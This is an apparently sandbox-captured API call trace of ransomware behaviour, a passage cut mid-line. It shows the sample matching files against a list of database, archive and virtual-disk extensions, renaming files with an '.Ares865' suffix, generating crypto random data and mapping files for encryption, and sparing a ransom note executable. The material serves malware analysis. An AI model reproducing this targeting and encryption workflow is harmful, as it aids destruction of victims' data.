lstrcmpiW (lpString1="cab", lpString2="cdb") returned -1 [0079.278] lstrlenW (lpString="ckp") returned 3 [0079.278] lstrcmpiW (lpString1="cab", lpString2="ckp") returned -1 [0079.278] lstrlenW (lpString="cma") returned 3 [0079.278] lstrcmpiW (lpString1="cab", lpString2="cma") returned -1 [0079.278] lstrlenW (lpString="cpd") returned 3 [0079.278] lstrcmpiW (lpString1="cab", lpString2="cpd") returned -1 [0079.278] lstrlenW (lpString="dacpac") returned 6 [0079.278] lstrcmpiW (lpString1="b1.cab", lpString2="dacpac") returned -1 [0079.278] lstrlenW (lpString="dad") returned 3 [0079.278] lstrcmpiW (lpString1="cab", lpString2="dad") returned -1 [0079.278] lstrlenW (lpString="dadiagrams") returned 10 [0079.278] lstrlenW (lpString="daschema") returned 8 [0079.278] lstrlenW (lpString="db-journal") returned 10 [0079.278] lstrlenW (lpString="db-shm") returned 6 [0079.278] lstrcmpiW (lpString1="b1.cab", lpString2="db-shm") returned -1 [0079.278] lstrlenW (lpString="db-wal") returned 6 [0079.278] lstrcmpiW (lpString1="b1.cab", lpString2="db-wal") returned -1 [0079.278] lstrlenW (lpString="dbc") returned 3 [0079.278] lstrcmpiW (lpString1="cab", lpString2="dbc") returned -1 [0079.278] lstrlenW (lpString="dbs") returned 3 [0079.278] lstrcmpiW (lpString1="cab", lpString2="dbs") returned -1 [0079.278] lstrlenW (lpString="dbt") returned 3 [0079.278] lstrcmpiW (lpString1="cab", lpString2="dbt") returned -1 [0079.278] lstrlenW (lpString="dbv") returned 3 [0079.279] lstrcmpiW (lpString1="cab", lpString2="dbv") returned -1 [0079.279] lstrlenW (lpString="dbx") returned 3 [0079.279] lstrcmpiW (lpString1="cab", lpString2="dbx") returned -1 [0079.279] lstrlenW (lpString="dcb") returned 3 [0079.279] lstrcmpiW (lpString1="cab", lpString2="dcb") returned -1 [0079.279] lstrlenW (lpString="dct") returned 3 [0079.279] lstrcmpiW (lpString1="cab", lpString2="dct") returned -1 [0079.279] lstrlenW (lpString="dcx") returned 3 [0079.279] lstrcmpiW (lpString1="cab", lpString2="dcx") returned -1 [0079.279] lstrlenW (lpString="ddl") returned 3 [0079.279] lstrcmpiW (lpString1="cab", lpString2="ddl") returned -1 [0079.279] lstrlenW (lpString="dlis") returned 4 [0079.279] lstrcmpiW (lpString1=".cab", lpString2="dlis") returned -1 [0079.279] lstrlenW (lpString="dp1") returned 3 [0079.279] lstrcmpiW (lpString1="cab", lpString2="dp1") returned -1 [0079.279] lstrlenW (lpString="dqy") returned 3 [0079.279] lstrcmpiW (lpString1="cab", lpString2="dqy") returned -1 [0079.279] lstrlenW (lpString="dsk") returned 3 [0079.279] lstrcmpiW (lpString1="cab", lpString2="dsk") returned -1 [0079.279] lstrlenW (lpString="dsn") returned 3 [0079.279] lstrcmpiW (lpString1="cab", lpString2="dsn") returned -1 [0079.279] lstrlenW (lpString="dtsx") returned 4 [0079.279] lstrcmpiW (lpString1=".cab", lpString2="dtsx") returned -1 [0079.279] lstrlenW (lpString="dxl") returned 3 [0079.279] lstrcmpiW (lpString1="cab", lpString2="dxl") returned -1 [0079.279] lstrlenW (lpString="eco") returned 3 [0079.279] lstrcmpiW (lpString1="cab", lpString2="eco") returned -1 [0079.279] lstrlenW (lpString="ecx") returned 3 [0079.279] lstrcmpiW (lpString1="cab", lpString2="ecx") returned -1 [0079.279] lstrlenW (lpString="edb") returned 3 [0079.279] lstrcmpiW (lpString1="cab", lpString2="edb") returned -1 [0079.279] lstrlenW (lpString="epim") returned 4 [0079.279] lstrcmpiW (lpString1=".cab", lpString2="epim") returned -1 [0079.279] lstrlenW (lpString="fcd") returned 3 [0079.279] lstrcmpiW (lpString1="cab", lpString2="fcd") returned -1 [0079.279] lstrlenW (lpString="fdb") returned 3 [0079.279] lstrcmpiW (lpString1="cab", lpString2="fdb") returned -1 [0079.279] lstrlenW (lpString="fic") returned 3 [0079.280] lstrcmpiW (lpString1="cab", lpString2="fic") returned -1 [0079.280] lstrlenW (lpString="flexolibrary") returned 12 [0079.280] lstrlenW (lpString="fm5") returned 3 [0079.280] lstrcmpiW (lpString1="cab", lpString2="fm5") returned -1 [0079.280] lstrlenW (lpString="fmp") returned 3 [0079.280] lstrcmpiW (lpString1="cab", lpString2="fmp") returned -1 [0079.280] lstrlenW (lpString="fmp12") returned 5 [0079.280] lstrcmpiW (lpString1="1.cab", lpString2="fmp12") returned -1 [0079.280] lstrlenW (lpString="fmpsl") returned 5 [0079.280] lstrcmpiW (lpString1="1.cab", lpString2="fmpsl") returned -1 [0079.280] lstrlenW (lpString="fol") returned 3 [0079.280] lstrcmpiW (lpString1="cab", lpString2="fol") returned -1 [0079.280] lstrlenW (lpString="fp3") returned 3 [0079.280] lstrcmpiW (lpString1="cab", lpString2="fp3") returned -1 [0079.280] lstrlenW (lpString="fp4") returned 3 [0079.280] lstrcmpiW (lpString1="cab", lpString2="fp4") returned -1 [0079.280] lstrlenW (lpString="fp5") returned 3 [0079.280] lstrcmpiW (lpString1="cab", lpString2="fp5") returned -1 [0079.280] lstrlenW (lpString="fp7") returned 3 [0079.280] lstrcmpiW (lpString1="cab", lpString2="fp7") returned -1 [0079.280] lstrlenW (lpString="fpt") returned 3 [0079.280] lstrcmpiW (lpString1="cab", lpString2="fpt") returned -1 [0079.280] lstrlenW (lpString="frm") returned 3 [0079.280] lstrcmpiW (lpString1="cab", lpString2="frm") returned -1 [0079.280] lstrlenW (lpString="gdb") returned 3 [0079.280] lstrcmpiW (lpString1="cab", lpString2="gdb") returned -1 [0079.280] lstrlenW (lpString="gdb") returned 3 [0079.280] lstrcmpiW (lpString1="cab", lpString2="gdb") returned -1 [0079.280] lstrlenW (lpString="grdb") returned 4 [0079.280] lstrcmpiW (lpString1=".cab", lpString2="grdb") returned -1 [0079.280] lstrlenW (lpString="gwi") returned 3 [0079.280] lstrcmpiW (lpString1="cab", lpString2="gwi") returned -1 [0079.280] lstrlenW (lpString="hdb") returned 3 [0079.280] lstrcmpiW (lpString1="cab", lpString2="hdb") returned -1 [0079.280] lstrlenW (lpString="his") returned 3 [0079.280] lstrcmpiW (lpString1="cab", lpString2="his") returned -1 [0079.280] lstrlenW (lpString="ib") returned 2 [0079.280] lstrcmpiW (lpString1="ab", lpString2="ib") returned -1 [0079.280] lstrlenW (lpString="idb") returned 3 [0079.281] lstrcmpiW (lpString1="cab", lpString2="idb") returned -1 [0079.281] lstrlenW (lpString="ihx") returned 3 [0079.281] lstrcmpiW (lpString1="cab", lpString2="ihx") returned -1 [0079.281] lstrlenW (lpString="itdb") returned 4 [0079.281] lstrcmpiW (lpString1=".cab", lpString2="itdb") returned -1 [0079.281] lstrlenW (lpString="itw") returned 3 [0079.281] lstrcmpiW (lpString1="cab", lpString2="itw") returned -1 [0079.281] lstrlenW (lpString="jet") returned 3 [0079.281] lstrcmpiW (lpString1="cab", lpString2="jet") returned -1 [0079.281] lstrlenW (lpString="jtx") returned 3 [0079.281] lstrcmpiW (lpString1="cab", lpString2="jtx") returned -1 [0079.281] lstrlenW (lpString="kdb") returned 3 [0079.281] lstrcmpiW (lpString1="cab", lpString2="kdb") returned -1 [0079.281] lstrlenW (lpString="kexi") returned 4 [0079.281] lstrcmpiW (lpString1=".cab", lpString2="kexi") returned -1 [0079.281] lstrlenW (lpString="kexic") returned 5 [0079.281] lstrcmpiW (lpString1="1.cab", lpString2="kexic") returned -1 [0079.281] lstrlenW (lpString="kexis") returned 5 [0079.281] lstrcmpiW (lpString1="1.cab", lpString2="kexis") returned -1 [0079.281] lstrlenW (lpString="lgc") returned 3 [0079.281] lstrcmpiW (lpString1="cab", lpString2="lgc") returned -1 [0079.281] lstrlenW (lpString="lwx") returned 3 [0079.281] lstrcmpiW (lpString1="cab", lpString2="lwx") returned -1 [0079.281] lstrlenW (lpString="maf") returned 3 [0079.281] lstrcmpiW (lpString1="cab", lpString2="maf") returned -1 [0079.281] lstrlenW (lpString="maq") returned 3 [0079.281] lstrcmpiW (lpString1="cab", lpString2="maq") returned -1 [0079.281] lstrlenW (lpString="mar") returned 3 [0079.281] lstrcmpiW (lpString1="cab", lpString2="mar") returned -1 [0079.281] lstrlenW (lpString="marshal") returned 7 [0079.281] lstrcmpiW (lpString1="ab1.cab", lpString2="marshal") returned -1 [0079.281] lstrlenW (lpString="mas") returned 3 [0079.281] lstrcmpiW (lpString1="cab", lpString2="mas") returned -1 [0079.281] lstrlenW (lpString="mav") returned 3 [0079.281] lstrcmpiW (lpString1="cab", lpString2="mav") returned -1 [0079.281] lstrlenW (lpString="maw") returned 3 [0079.281] lstrcmpiW (lpString1="cab", lpString2="maw") returned -1 [0079.281] lstrlenW (lpString="mdbhtml") returned 7 [0079.282] lstrcmpiW (lpString1="ab1.cab", lpString2="mdbhtml") returned -1 [0079.282] lstrlenW (lpString="mdn") returned 3 [0079.282] lstrcmpiW (lpString1="cab", lpString2="mdn") returned -1 [0079.282] lstrlenW (lpString="mdt") returned 3 [0079.282] lstrcmpiW (lpString1="cab", lpString2="mdt") returned -1 [0079.282] lstrlenW (lpString="mfd") returned 3 [0079.282] lstrcmpiW (lpString1="cab", lpString2="mfd") returned -1 [0079.282] lstrlenW (lpString="mpd") returned 3 [0079.282] lstrcmpiW (lpString1="cab", lpString2="mpd") returned -1 [0079.282] lstrlenW (lpString="mrg") returned 3 [0079.282] lstrcmpiW (lpString1="cab", lpString2="mrg") returned -1 [0079.282] lstrlenW (lpString="mud") returned 3 [0079.282] lstrcmpiW (lpString1="cab", lpString2="mud") returned -1 [0079.282] lstrlenW (lpString="mwb") returned 3 [0079.282] lstrcmpiW (lpString1="cab", lpString2="mwb") returned -1 [0079.282] lstrlenW (lpString="myd") returned 3 [0079.282] lstrcmpiW (lpString1="cab", lpString2="myd") returned -1 [0079.282] lstrlenW (lpString="ndf") returned 3 [0079.282] lstrcmpiW (lpString1="cab", lpString2="ndf") returned -1 [0079.282] lstrlenW (lpString="nnt") returned 3 [0079.282] lstrcmpiW (lpString1="cab", lpString2="nnt") returned -1 [0079.282] lstrlenW (lpString="nrmlib") returned 6 [0079.282] lstrcmpiW (lpString1="b1.cab", lpString2="nrmlib") returned -1 [0079.282] lstrlenW (lpString="ns2") returned 3 [0079.282] lstrcmpiW (lpString1="cab", lpString2="ns2") returned -1 [0079.282] lstrlenW (lpString="ns3") returned 3 [0079.282] lstrcmpiW (lpString1="cab", lpString2="ns3") returned -1 [0079.282] lstrlenW (lpString="ns4") returned 3 [0079.282] lstrcmpiW (lpString1="cab", lpString2="ns4") returned -1 [0079.282] lstrlenW (lpString="nsf") returned 3 [0079.282] lstrcmpiW (lpString1="cab", lpString2="nsf") returned -1 [0079.282] lstrlenW (lpString="nv") returned 2 [0079.282] lstrcmpiW (lpString1="ab", lpString2="nv") returned -1 [0079.282] lstrlenW (lpString="nv2") returned 3 [0079.282] lstrcmpiW (lpString1="cab", lpString2="nv2") returned -1 [0079.282] lstrlenW (lpString="nwdb") returned 4 [0079.283] lstrcmpiW (lpString1=".cab", lpString2="nwdb") returned -1 [0079.283] lstrlenW (lpString="nyf") returned 3 [0079.283] lstrcmpiW (lpString1="cab", lpString2="nyf") returned -1 [0079.283] lstrlenW (lpString="odb") returned 3 [0079.283] lstrcmpiW (lpString1="cab", lpString2="odb") returned -1 [0079.283] lstrlenW (lpString="odb") returned 3 [0079.283] lstrcmpiW (lpString1="cab", lpString2="odb") returned -1 [0079.283] lstrlenW (lpString="oqy") returned 3 [0079.283] lstrcmpiW (lpString1="cab", lpString2="oqy") returned -1 [0079.283] lstrlenW (lpString="ora") returned 3 [0079.283] lstrcmpiW (lpString1="cab", lpString2="ora") returned -1 [0079.283] lstrlenW (lpString="orx") returned 3 [0079.283] lstrcmpiW (lpString1="cab", lpString2="orx") returned -1 [0079.283] lstrlenW (lpString="owc") returned 3 [0079.283] lstrcmpiW (lpString1="cab", lpString2="owc") returned -1 [0079.283] lstrlenW (lpString="p96") returned 3 [0079.283] lstrcmpiW (lpString1="cab", lpString2="p96") returned -1 [0079.283] lstrlenW (lpString="p97") returned 3 [0079.283] lstrcmpiW (lpString1="cab", lpString2="p97") returned -1 [0079.283] lstrlenW (lpString="pan") returned 3 [0079.283] lstrcmpiW (lpString1="cab", lpString2="pan") returned -1 [0079.283] lstrlenW (lpString="pdb") returned 3 [0079.283] lstrcmpiW (lpString1="cab", lpString2="pdb") returned -1 [0079.283] lstrlenW (lpString="pdm") returned 3 [0079.283] lstrcmpiW (lpString1="cab", lpString2="pdm") returned -1 [0079.283] lstrlenW (lpString="pnz") returned 3 [0079.283] lstrcmpiW (lpString1="cab", lpString2="pnz") returned -1 [0079.283] lstrlenW (lpString="qry") returned 3 [0079.283] lstrcmpiW (lpString1="cab", lpString2="qry") returned -1 [0079.283] lstrlenW (lpString="qvd") returned 3 [0079.283] lstrcmpiW (lpString1="cab", lpString2="qvd") returned -1 [0079.283] lstrlenW (lpString="rbf") returned 3 [0079.283] lstrcmpiW (lpString1="cab", lpString2="rbf") returned -1 [0079.283] lstrlenW (lpString="rctd") returned 4 [0079.283] lstrcmpiW (lpString1=".cab", lpString2="rctd") returned -1 [0079.283] lstrlenW (lpString="rod") returned 3 [0079.283] lstrcmpiW (lpString1="cab", lpString2="rod") returned -1 [0079.283] lstrlenW (lpString="rodx") returned 4 [0079.284] lstrcmpiW (lpString1=".cab", lpString2="rodx") returned -1 [0079.284] lstrlenW (lpString="rpd") returned 3 [0079.284] lstrcmpiW (lpString1="cab", lpString2="rpd") returned -1 [0079.284] lstrlenW (lpString="rsd") returned 3 [0079.284] lstrcmpiW (lpString1="cab", lpString2="rsd") returned -1 [0079.284] lstrlenW (lpString="sas7bdat") returned 8 [0079.284] lstrlenW (lpString="sbf") returned 3 [0079.284] lstrcmpiW (lpString1="cab", lpString2="sbf") returned -1 [0079.284] lstrlenW (lpString="scx") returned 3 [0079.284] lstrcmpiW (lpString1="cab", lpString2="scx") returned -1 [0079.284] lstrlenW (lpString="sdb") returned 3 [0079.284] lstrcmpiW (lpString1="cab", lpString2="sdb") returned -1 [0079.284] lstrlenW (lpString="sdc") returned 3 [0079.284] lstrcmpiW (lpString1="cab", lpString2="sdc") returned -1 [0079.284] lstrlenW (lpString="sdf") returned 3 [0079.284] lstrcmpiW (lpString1="cab", lpString2="sdf") returned -1 [0079.284] lstrlenW (lpString="sis") returned 3 [0079.284] lstrcmpiW (lpString1="cab", lpString2="sis") returned -1 [0079.284] lstrlenW (lpString="spq") returned 3 [0079.284] lstrcmpiW (lpString1="cab", lpString2="spq") returned -1 [0079.284] lstrlenW (lpString="te") returned 2 [0079.284] lstrcmpiW (lpString1="ab", lpString2="te") returned -1 [0079.284] lstrlenW (lpString="teacher") returned 7 [0079.284] lstrcmpiW (lpString1="ab1.cab", lpString2="teacher") returned -1 [0079.284] lstrlenW (lpString="tmd") returned 3 [0079.284] lstrcmpiW (lpString1="cab", lpString2="tmd") returned -1 [0079.284] lstrlenW (lpString="tps") returned 3 [0079.284] lstrcmpiW (lpString1="cab", lpString2="tps") returned -1 [0079.284] lstrlenW (lpString="trc") returned 3 [0079.284] lstrcmpiW (lpString1="cab", lpString2="trc") returned -1 [0079.284] lstrlenW (lpString="trc") returned 3 [0079.284] lstrcmpiW (lpString1="cab", lpString2="trc") returned -1 [0079.284] lstrlenW (lpString="trm") returned 3 [0079.284] lstrcmpiW (lpString1="cab", lpString2="trm") returned -1 [0079.284] lstrlenW (lpString="udb") returned 3 [0079.284] lstrcmpiW (lpString1="cab", lpString2="udb") returned -1 [0079.284] lstrlenW (lpString="udl") returned 3 [0079.284] lstrcmpiW (lpString1="cab", lpString2="udl") returned -1 [0079.285] lstrlenW (lpString="usr") returned 3 [0079.285] lstrcmpiW (lpString1="cab", lpString2="usr") returned -1 [0079.285] lstrlenW (lpString="v12") returned 3 [0079.285] lstrcmpiW (lpString1="cab", lpString2="v12") returned -1 [0079.285] lstrlenW (lpString="vis") returned 3 [0079.285] lstrcmpiW (lpString1="cab", lpString2="vis") returned -1 [0079.285] lstrlenW (lpString="vpd") returned 3 [0079.285] lstrcmpiW (lpString1="cab", lpString2="vpd") returned -1 [0079.285] lstrlenW (lpString="vvv") returned 3 [0079.285] lstrcmpiW (lpString1="cab", lpString2="vvv") returned -1 [0079.285] lstrlenW (lpString="wdb") returned 3 [0079.285] lstrcmpiW (lpString1="cab", lpString2="wdb") returned -1 [0079.285] lstrlenW (lpString="wmdb") returned 4 [0079.285] lstrcmpiW (lpString1=".cab", lpString2="wmdb") returned -1 [0079.285] lstrlenW (lpString="wrk") returned 3 [0079.285] lstrcmpiW (lpString1="cab", lpString2="wrk") returned -1 [0079.285] lstrlenW (lpString="xdb") returned 3 [0079.285] lstrcmpiW (lpString1="cab", lpString2="xdb") returned -1 [0079.285] lstrlenW (lpString="xld") returned 3 [0079.285] lstrcmpiW (lpString1="cab", lpString2="xld") returned -1 [0079.285] lstrlenW (lpString="xmlff") returned 5 [0079.285] lstrcmpiW (lpString1="1.cab", lpString2="xmlff") returned -1 [0079.285] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\cab1.cab.Ares865") returned 130 [0079.285] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\cab1.cab"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\cab1.cab.Ares865" (normalized: "c:\\users\\all users\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\cab1.cab.ares865"), dwFlags=0x1) returned 1 [0079.286] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\cab1.cab.Ares865" (normalized: "c:\\users\\all users\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\cab1.cab.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0079.286] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1292987) returned 1 [0079.286] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0079.287] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0079.287] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0079.287] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f02f8) returned 1 [0079.288] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0079.288] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0079.288] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13bdc0, lpName=0x0) returned 0x15c [0079.289] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13bdc0) returned 0x3240000 [0081.553] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0081.554] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0081.554] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0081.554] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2fe0 [0081.554] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2fe0 | out: hHeap=0x2b0000) returned 1 [0081.554] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31f2e0 [0081.554] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0081.554] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31f2e0 | out: hHeap=0x2b0000) returned 1 [0081.555] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0081.555] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0081.555] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0081.555] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0081.555] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0081.555] UnmapViewOfFile (lpBaseAddress=0x3240000) returned 1 [0081.566] CloseHandle (hObject=0x15c) returned 1 [0081.566] CloseHandle (hObject=0x118) returned 1 [0081.566] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0081.566] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0081.566] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0081.619] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c231540, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c231540, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0081.619] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0081.619] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb17b200, ftCreationTime.dwHighDateTime=0x1d28824, ftLastAccessTime.dwLowDateTime=0xfb17b200, ftLastAccessTime.dwHighDateTime=0x1d28824, ftLastWriteTime.dwLowDateTime=0xfb17b200, ftLastWriteTime.dwHighDateTime=0x1d28824, nFileSizeHigh=0x0, nFileSizeLow=0x24000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vc_runtimeMinimum_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0081.619] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0081.619] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="aoldtz.exe") returned 1 [0081.619] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2=".") returned 1 [0081.619] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="..") returned 1 [0081.619] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="windows") returned -1 [0081.619] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="bootmgr") returned 1 [0081.619] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="temp") returned 1 [0081.619] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="pagefile.sys") returned 1 [0081.620] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="boot") returned 1 [0081.620] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="ids.txt") returned 1 [0081.620] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="ntuser.dat") returned 1 [0081.620] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="perflogs") returned 1 [0081.620] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="MSBuild") returned 1 [0081.620] lstrlenW (lpString="vc_runtimeMinimum_x86.msi") returned 25 [0081.620] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\cab1.cab") returned 122 [0081.620] lstrcpyW (in: lpString1=0x2cce4e4, lpString2="vc_runtimeMinimum_x86.msi" | out: lpString1="vc_runtimeMinimum_x86.msi") returned="vc_runtimeMinimum_x86.msi" [0081.620] lstrlenW (lpString="vc_runtimeMinimum_x86.msi") returned 25 [0081.620] lstrlenW (lpString="Ares865") returned 7 [0081.620] lstrcmpiW (lpString1="x86.msi", lpString2="Ares865") returned 1 [0081.620] lstrlenW (lpString=".dll") returned 4 [0081.620] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2=".dll") returned 1 [0081.620] lstrlenW (lpString=".lnk") returned 4 [0081.620] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2=".lnk") returned 1 [0081.620] lstrlenW (lpString=".ini") returned 4 [0081.620] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2=".ini") returned 1 [0081.620] lstrlenW (lpString=".sys") returned 4 [0081.620] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2=".sys") returned 1 [0081.620] lstrlenW (lpString="vc_runtimeMinimum_x86.msi") returned 25 [0081.620] lstrlenW (lpString="bak") returned 3 [0081.620] lstrcmpiW (lpString1="msi", lpString2="bak") returned 1 [0081.620] lstrlenW (lpString="ba_") returned 3 [0081.620] lstrcmpiW (lpString1="msi", lpString2="ba_") returned 1 [0081.620] lstrlenW (lpString="dbb") returned 3 [0081.620] lstrcmpiW (lpString1="msi", lpString2="dbb") returned 1 [0081.620] lstrlenW (lpString="vmdk") returned 4 [0081.620] lstrcmpiW (lpString1=".msi", lpString2="vmdk") returned -1 [0081.620] lstrlenW (lpString="rar") returned 3 [0081.620] lstrcmpiW (lpString1="msi", lpString2="rar") returned -1 [0081.620] lstrlenW (lpString="zip") returned 3 [0081.620] lstrcmpiW (lpString1="msi", lpString2="zip") returned -1 [0081.620] lstrlenW (lpString="tgz") returned 3 [0081.620] lstrcmpiW (lpString1="msi", lpString2="tgz") returned -1 [0081.620] lstrlenW (lpString="vbox") returned 4 [0081.620] lstrcmpiW (lpString1=".msi", lpString2="vbox") returned -1 [0081.621] lstrlenW (lpString="vdi") returned 3 [0081.621] lstrcmpiW (lpString1="msi", lpString2="vdi") returned -1 [0081.621] lstrlenW (lpString="vhd") returned 3 [0081.621] lstrcmpiW (lpString1="msi", lpString2="vhd") returned -1 [0081.621] lstrlenW (lpString="vhdx") returned 4 [0081.621] lstrcmpiW (lpString1=".msi", lpString2="vhdx") returned -1 [0081.621] lstrlenW (lpString="avhd") returned 4 [0081.621] lstrcmpiW (lpString1=".msi", lpString2="avhd") returned -1 [0081.621] lstrlenW (lpString="db") returned 2 [0081.621] lstrcmpiW (lpString1="si", lpString2="db") returned 1 [0081.621] lstrlenW (lpString="db2") returned 3 [0081.621] lstrcmpiW (lpString1="msi", lpString2="db2") returned 1 [0081.621] lstrlenW (lpString="db3") returned 3 [0081.621] lstrcmpiW (lpString1="msi", lpString2="db3") returned 1 [0081.621] lstrlenW (lpString="dbf") returned 3 [0081.621] lstrcmpiW (lpString1="msi", lpString2="dbf") returned 1 [0081.621] lstrlenW (lpString="mdf") returned 3 [0081.621] lstrcmpiW (lpString1="msi", lpString2="mdf") returned 1 [0081.621] lstrlenW (lpString="mdb") returned 3 [0081.621] lstrcmpiW (lpString1="msi", lpString2="mdb") returned 1 [0081.621] lstrlenW (lpString="sql") returned 3 [0081.621] lstrcmpiW (lpString1="msi", lpString2="sql") returned -1 [0081.621] lstrlenW (lpString="sqlite") returned 6 [0081.621] lstrcmpiW (lpString1="86.msi", lpString2="sqlite") returned -1 [0081.621] lstrlenW (lpString="sqlite3") returned 7 [0081.621] lstrcmpiW (lpString1="x86.msi", lpString2="sqlite3") returned 1 [0081.621] lstrlenW (lpString="sqlitedb") returned 8 [0081.621] lstrcmpiW (lpString1="_x86.msi", lpString2="sqlitedb") returned -1 [0081.621] lstrlenW (lpString="xml") returned 3 [0081.621] lstrcmpiW (lpString1="msi", lpString2="xml") returned -1 [0081.621] lstrlenW (lpString="$er") returned 3 [0081.621] lstrcmpiW (lpString1="msi", lpString2="$er") returned 1 [0081.621] lstrlenW (lpString="4dd") returned 3 [0081.621] lstrcmpiW (lpString1="msi", lpString2="4dd") returned 1 [0081.621] lstrlenW (lpString="4dl") returned 3 [0081.621] lstrcmpiW (lpString1="msi", 